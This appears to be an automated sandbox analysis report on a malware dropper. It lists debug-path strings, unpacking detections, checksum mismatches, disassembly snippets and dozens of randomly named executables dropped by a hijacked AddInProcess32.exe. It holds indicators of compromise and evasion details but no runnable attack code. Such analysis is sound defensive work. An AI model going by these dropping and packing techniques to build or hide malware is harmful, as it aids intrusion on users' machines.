                  Source: Binary string: EfiGuardDxe.pdb source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000ACD000.00000040.00000001.01000000.00000012.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.000000000346C000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.00000000034DC000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000ACD000.00000040.00000001.01000000.0000000E.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.000000000348C000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000ACD000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.000000000337C000.00000040.00001000.00020000.00000000.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000ACD000.00000040.00000001.01000000.00000011.sdmp, LP2uR8v5nKtflOO7HsEX74Am.exe, 00000019.00000002.3250452098.000000000354C000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\admin\source\repos\driver-process-monitor-master\x64\Release\WinmonProcessMonitor.pdb source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.00000000031E3000.00000040.00001000.00020000.00000000.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000843000.00000040.00000001.01000000.00000012.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000843000.00000040.00000001.01000000.0000000E.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.0000000003253000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.0000000003203000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000843000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000843000.00000040.00000001.01000000.00000011.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.00000000030F3000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: Signature does not matchThe module signature does not match with .pdb signature source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000ACD000.00000040.00000001.01000000.00000012.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.000000000346C000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.00000000034DC000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000ACD000.00000040.00000001.01000000.0000000E.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.000000000348C000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000ACD000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.000000000337C000.00000040.00001000.00020000.00000000.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000ACD000.00000040.00000001.01000000.00000011.sdmp, LP2uR8v5nKtflOO7HsEX74Am.exe, 00000019.00000002.3250452098.000000000354C000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: dbghelp.pdb source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000ACD000.00000040.00000001.01000000.00000012.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.000000000346C000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.00000000034DC000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000ACD000.00000040.00000001.01000000.0000000E.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.000000000348C000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000ACD000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.000000000337C000.00000040.00001000.00020000.00000000.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000ACD000.00000040.00000001.01000000.00000011.sdmp
                  Source: Binary string: dbghelp.pdbGCTL source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000ACD000.00000040.00000001.01000000.00000012.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.000000000346C000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.00000000034DC000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000ACD000.00000040.00000001.01000000.0000000E.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.000000000348C000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000ACD000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.000000000337C000.00000040.00001000.00020000.00000000.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000ACD000.00000040.00000001.01000000.00000011.sdmp

                  Data Obfuscation

                  barindex
                  Detected unpacking (changes PE section rights)
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeUnpacked PE file: 15.2.syncUpd.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;
                  Source: C:\Users\user\Pictures\VT4T5BrKWgz9d48cmEd8ePkZ.exeUnpacked PE file: 16.2.VT4T5BrKWgz9d48cmEd8ePkZ.exe.400000.2.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.reloc:R;.symtab:R;
                  Source: C:\Users\user\Pictures\sUyDoVTGsfEnMY0oeyexTBut.exeUnpacked PE file: 17.2.sUyDoVTGsfEnMY0oeyexTBut.exe.400000.5.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.reloc:R;.symtab:R;
                  Source: C:\Users\user\Pictures\VvPx7JMqkEvTJAQ2rPS2y2wf.exeUnpacked PE file: 18.2.VvPx7JMqkEvTJAQ2rPS2y2wf.exe.400000.5.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.reloc:R;.symtab:R;
                  Source: C:\Users\user\Pictures\MVwPLcOCrd7Zgqh1ZdkGUuVZ.exeUnpacked PE file: 20.2.MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe.400000.2.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.reloc:R;.symtab:R;
                  Source: C:\Users\user\Pictures\LP2uR8v5nKtflOO7HsEX74Am.exeUnpacked PE file: 25.2.LP2uR8v5nKtflOO7HsEX74Am.exe.400000.1.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.reloc:R;.symtab:R;
                  Source: C:\Users\user\Pictures\YfSmDepXBWKsGmamEEWNYwB5.exeUnpacked PE file: 30.2.YfSmDepXBWKsGmamEEWNYwB5.exe.400000.6.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.reloc:R;.symtab:R;
                  Source: C:\Users\user\Pictures\pxzTG78L668f3mDyeDkHXryr.exeUnpacked PE file: 32.2.pxzTG78L668f3mDyeDkHXryr.exe.400000.6.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.reloc:R;.symtab:R;
                  Source: C:\Users\user\Pictures\MK1r6sTJJ0KuvAGWdjimbW8H.exeUnpacked PE file: 33.2.MK1r6sTJJ0KuvAGWdjimbW8H.exe.400000.5.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.reloc:R;.symtab:R;
                  Source: C:\Users\user\Pictures\PM6qM9TthMxsL1RAWEhuUNLx.exeUnpacked PE file: 36.2.PM6qM9TthMxsL1RAWEhuUNLx.exe.400000.3.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.reloc:R;.symtab:R;
                  Detected unpacking (overwrites its own PE header)
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeUnpacked PE file: 15.2.syncUpd.exe.400000.0.unpack
                  Source: C:\Users\user\Pictures\VT4T5BrKWgz9d48cmEd8ePkZ.exeUnpacked PE file: 16.2.VT4T5BrKWgz9d48cmEd8ePkZ.exe.400000.2.unpack
                  Source: C:\Users\user\Pictures\sUyDoVTGsfEnMY0oeyexTBut.exeUnpacked PE file: 17.2.sUyDoVTGsfEnMY0oeyexTBut.exe.400000.5.unpack
                  Source: C:\Users\user\Pictures\VvPx7JMqkEvTJAQ2rPS2y2wf.exeUnpacked PE file: 18.2.VvPx7JMqkEvTJAQ2rPS2y2wf.exe.400000.5.unpack
                  Source: C:\Users\user\Pictures\MVwPLcOCrd7Zgqh1ZdkGUuVZ.exeUnpacked PE file: 20.2.MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe.400000.2.unpack
                  Source: C:\Users\user\Pictures\LP2uR8v5nKtflOO7HsEX74Am.exeUnpacked PE file: 25.2.LP2uR8v5nKtflOO7HsEX74Am.exe.400000.1.unpack
                  Source: C:\Users\user\Pictures\YfSmDepXBWKsGmamEEWNYwB5.exeUnpacked PE file: 30.2.YfSmDepXBWKsGmamEEWNYwB5.exe.400000.6.unpack
                  Source: C:\Users\user\Pictures\pxzTG78L668f3mDyeDkHXryr.exeUnpacked PE file: 32.2.pxzTG78L668f3mDyeDkHXryr.exe.400000.6.unpack
                  Source: C:\Users\user\Pictures\MK1r6sTJJ0KuvAGWdjimbW8H.exeUnpacked PE file: 33.2.MK1r6sTJJ0KuvAGWdjimbW8H.exe.400000.5.unpack
                  Source: C:\Users\user\Pictures\PM6qM9TthMxsL1RAWEhuUNLx.exeUnpacked PE file: 36.2.PM6qM9TthMxsL1RAWEhuUNLx.exe.400000.3.unpack
                  Source: dl7WL77rkA.exeStatic PE information: 0xC398581B [Tue Dec 26 19:12:27 2073 UTC]
                  Source: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exeCode function: 12_2_0040AF7C LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer,12_2_0040AF7C
                  Source: MK1r6sTJJ0KuvAGWdjimbW8H.exe.5.drStatic PE information: real checksum: 0x4209a3 should be: 0x423035
                  Source: Tll62OaP8oVLTcLcTrzOXqGl.exe.5.drStatic PE information: real checksum: 0x1eaa5 should be: 0x1d4c14
                  Source: gIvDEh2BZp9B1K9gi8nXHxAG.exe.5.drStatic PE information: real checksum: 0x1eaa5 should be: 0x1d4c14
                  Source: sUyDoVTGsfEnMY0oeyexTBut.exe.5.drStatic PE information: real checksum: 0x4209a3 should be: 0x41eaf6
                  Source: yq7sRYx0zxf2nUHNI8myIvQb.exe.5.drStatic PE information: real checksum: 0x1eaa5 should be: 0x1d4c14
                  Source: pxzTG78L668f3mDyeDkHXryr.exe.5.drStatic PE information: real checksum: 0x4209a3 should be: 0x41eaf6
                  Source: 3BiVM2uOsvGVXA1BoDorVuCU.exe.5.drStatic PE information: real checksum: 0x1eaa5 should be: 0x1d4c14
                  Source: yzAPe25HGnxqbkafYprXvqQ2.exe.5.drStatic PE information: real checksum: 0x1eaa5 should be: 0x1d4c14
                  Source: buQDl25QOPcDefNxAl6eKA66.exe.5.drStatic PE information: real checksum: 0x1eaa5 should be: 0x1d4c14
                  Source: kCfcZTexs2vlrkxr2iahpjn0.exe.5.drStatic PE information: real checksum: 0x1eaa5 should be: 0x1d4c14
                  Source: VT4T5BrKWgz9d48cmEd8ePkZ.exe.5.drStatic PE information: real checksum: 0x4209a3 should be: 0x41eaf6
                  Source: heli0xf9eUcd5qaTU2WhBrox.exe.5.drStatic PE information: real checksum: 0x1eaa5 should be: 0x1d4c14
                  Source: pdCLEldSyO5Ik39YE4kJVbXN.exe.5.drStatic PE information: real checksum: 0x4209a3 should be: 0x41eaf6
                  Source: cUZyyg5Iay7EkA1LG3XxNCAW.exe.5.drStatic PE information: real checksum: 0x1eaa5 should be: 0x1d4c14
                  Source: BroomSetup.exe.13.drStatic PE information: real checksum: 0x0 should be: 0x1c6750
                  Source: H7TIhgIvG1Yhal1QnwrEdA0q.exe.5.drStatic PE information: real checksum: 0x4209a3 should be: 0x423035
                  Source: FXJXJcvxtZRFvWakkN6k83di.exe.5.drStatic PE information: real checksum: 0x1eaa5 should be: 0x1d4c14
                  Source: XbJnQ7YPZT43Q5vvoXLuAoSq.exe.5.drStatic PE information: real checksum: 0x4209a3 should be: 0x41eaf6
                  Source: YHw4f8SZUCkdAWRXPfF1qOas.exe.5.drStatic PE information: real checksum: 0x4209a3 should be: 0x423035
                  Source: YfSmDepXBWKsGmamEEWNYwB5.exe.5.drStatic PE information: real checksum: 0x4209a3 should be: 0x423035
                  Source: INetC.dll.13.drStatic PE information: real checksum: 0x0 should be: 0xb6cc
                  Source: VvPx7JMqkEvTJAQ2rPS2y2wf.exe.5.drStatic PE information: real checksum: 0x4209a3 should be: 0x423035
                  Source: nPQO8Z9byTKoW0YecEtJrQN4.exe.5.drStatic PE information: real checksum: 0x1eaa5 should be: 0x1d4c14
                  Source: BitVM4h79HXjwHpz9WBgoxJI.exe.5.drStatic PE information: real checksum: 0x1eaa5 should be: 0x1d4c14
                  Source: PM6qM9TthMxsL1RAWEhuUNLx.exe.5.drStatic PE information: real checksum: 0x4209a3 should be: 0x423035
                  Source: IiRP3mWif0xpaQsabblBwYAE.exe.5.drStatic PE information: real checksum: 0x4209a3 should be: 0x423035
                  Source: SNePs0JIjHDOAKzI11CQ043K.exe.5.drStatic PE information: real checksum: 0x4209a3 should be: 0x41eaf6
                  Source: kDgMkoNM3lKxwY8D8wOiP15F.exe.5.drStatic PE information: real checksum: 0x1eaa5 should be: 0x1d4c14
                  Source: BTnjKpTBDzKtQo69b5SrwYDx.exe.5.drStatic PE information: real checksum: 0x1eaa5 should be: 0x1d4c14
                  Source: Jye7PnMsJdWwQaaabqxbHITx.exe.5.drStatic PE information: real checksum: 0x4209a3 should be: 0x423035
                  Source: IpW6W2Yjx6z6D3j66j3N2tH5.exe.5.drStatic PE information: real checksum: 0x4209a3 should be: 0x41eaf6
                  Source: 4xb6JU3I8UdzuT7ogqFnBL7Y.exe.5.drStatic PE information: real checksum: 0x4209a3 should be: 0x423035
                  Source: LP2uR8v5nKtflOO7HsEX74Am.exe.5.drStatic PE information: real checksum: 0x4209a3 should be: 0x41eaf6
                  Source: UbeikbXa4CwwIN3M94pDVFss.exe.5.drStatic PE information: real checksum: 0x1eaa5 should be: 0x1d4c14
                  Source: MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe.5.drStatic PE information: real checksum: 0x4209a3 should be: 0x423035
                  Source: RC2DCMOzLtOY3PfjMU0omeEi.exe.5.drStatic PE information: real checksum: 0x1eaa5 should be: 0x1d4c14
                  Source: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exeCode function: 12_2_004074E9 push ebp; ret 12_2_004074EA
                  Source: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exeCode function: 12_2_00405DD9 push ecx; ret 12_2_00405DEC
                  Source: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exeCode function: 12_2_004073E7 push 33000001h; retf 12_2_004073EC
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeCode function: 13_2_00402E4B push ebx; mov dword ptr [esp], 00413040h13_2_00402EF6
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeCode function: 13_2_00401860 push eax; mov dword ptr [esp], ebx13_2_0040192D
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeCode function: 13_2_00402613 push ecx; mov dword ptr [esp], ebx13_2_00402634
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeCode function: 13_2_0040183B push ecx; mov dword ptr [esp], eax13_2_0040184E
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeCode function: 13_2_004060FD push eax; mov dword ptr [esp], ebx13_2_004062A3
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeCode function: 13_2_004060FD push ebx; mov dword ptr [esp], 00434400h13_2_004062BE
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeCode function: 13_2_004060FD push eax; mov dword ptr [esp], 0040B410h13_2_00406446
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeCode function: 13_2_004060FD push esi; mov dword ptr [esp], 00000001h13_2_00406505
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeCode function: 13_2_004042BC push eax; mov dword ptr [esp], 00435400h13_2_004042CF
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeCode function: 13_2_004042BC push eax; mov dword ptr [esp], 00435400h13_2_004042F1
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeCode function: 13_2_0040815B push ebx; mov dword ptr [esp], 0042AF40h13_2_00408178
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeCode function: 13_2_0040815B push eax; mov dword ptr [esp], 0042AF40h13_2_004081F0
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeCode function: 13_2_00404375 push ecx; mov dword ptr [esp], ebx13_2_004043C9
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeCode function: 13_2_00404375 push ebx; mov dword ptr [esp], 0000000Bh13_2_004043E6
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeCode function: 13_2_00404375 push eax; mov dword ptr [esp], 00000000h13_2_00404471
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeCode function: 13_2_00404375 push edx; mov dword ptr [esp], eax13_2_004044AE
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeCode function: 13_2_00404375 push eax; mov dword ptr [esp], ebx13_2_00404590
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeCode function: 13_2_00404375 push eax; mov dword ptr [esp], 00435400h13_2_004046E6
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeCode function: 13_2_00404375 push ecx; mov dword ptr [esp], 00427D20h13_2_0040475B
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeCode function: 13_2_00404375 push eax; mov dword ptr [esp], 00427D20h13_2_004047C0
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeCode function: 13_2_00404375 push ebx; mov dword ptr [esp], 00000002h13_2_00404838
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeCode function: 13_2_00401B06 push edx; mov dword ptr [esp], eax13_2_00401B53
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeCode function: 13_2_00401B06 push edi; mov dword ptr [esp], 00412840h13_2_00401B6A
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeCode function: 13_2_00401DB0 push edi; mov dword ptr [esp], eax13_2_00401E18
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeCode function: 13_2_004085B8 push eax; mov dword ptr [esp], ebx13_2_00408671
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeCode function: 13_2_004085B8 push eax; mov dword ptr [esp], ebx13_2_0040873D
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeCode function: 13_2_004085B8 push eax; mov dword ptr [esp], ebx13_2_00408763
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeCode function: 13_2_004085B8 push ecx; mov dword ptr [esp], ebx13_2_004087E3
                  Source: initial sampleStatic PE information: section name: UPX0
                  Source: initial sampleStatic PE information: section name: UPX1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\gIvDEh2BZp9B1K9gi8nXHxAG.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\MK1r6sTJJ0KuvAGWdjimbW8H.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\nPQO8Z9byTKoW0YecEtJrQN4.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\kCfcZTexs2vlrkxr2iahpjn0.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\cUZyyg5Iay7EkA1LG3XxNCAW.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\H7TIhgIvG1Yhal1QnwrEdA0q.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\RC2DCMOzLtOY3PfjMU0omeEi.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\65bl5N8ldxUdfHpwZdasCC1T.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\sUyDoVTGsfEnMY0oeyexTBut.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\yq7sRYx0zxf2nUHNI8myIvQb.exeJump to dropped file
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeFile created: C:\Users\user\AppData\Local\Temp\syncUpd.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\nxFajWDYSB3pQQxmrqt3pD1T.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\LEGkdjk2eFexBjdd51KvbC5Q.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\VT4T5BrKWgz9d48cmEd8ePkZ.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\PM6qM9TthMxsL1RAWEhuUNLx.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\Tll62OaP8oVLTcLcTrzOXqGl.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\IiRP3mWif0xpaQsabblBwYAE.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\YHw4f8SZUCkdAWRXPfF1qOas.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\UbeikbXa4CwwIN3M94pDVFss.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\VvPx7JMqkEvTJAQ2rPS2y2wf.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\heli0xf9eUcd5qaTU2WhBrox.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\LP2uR8v5nKtflOO7HsEX74Am.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\buQDl25QOPcDefNxAl6eKA66.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\XbJnQ7YPZT43Q5vvoXLuAoSq.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\SNePs0JIjHDOAKzI11CQ043K.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\pdCLEldSyO5Ik39YE4kJVbXN.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\yzAPe25HGnxqbkafYprXvqQ2.exeJump to dropped file
                  Source: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exeFile created: C:\Users\user\AppData\Local\Temp\wfplwfs.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\Jye7PnMsJdWwQaaabqxbHITx.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\IpW6W2Yjx6z6D3j66j3N2tH5.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\BitVM4h79HXjwHpz9WBgoxJI.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\FXJXJcvxtZRFvWakkN6k83di.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\bAqeOotivBzC3mPFFhCilCro.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\S5LR4MxNYkipKICUEWwDRrcX.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\4xb6JU3I8UdzuT7ogqFnBL7Y.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\MVwPLcOCrd7Zgqh1ZdkGUuVZ.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\RLHqIpTNCBsmKjKBdfgpamFx.exeJump to dropped file
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeFile created: C:\Users\user\AppData\Local\Temp\BroomSetup.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\wHBfjqvEYiXClqcsZASJdtJJ.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\3BiVM2uOsvGVXA1BoDorVuCU.exeJump to dropped file
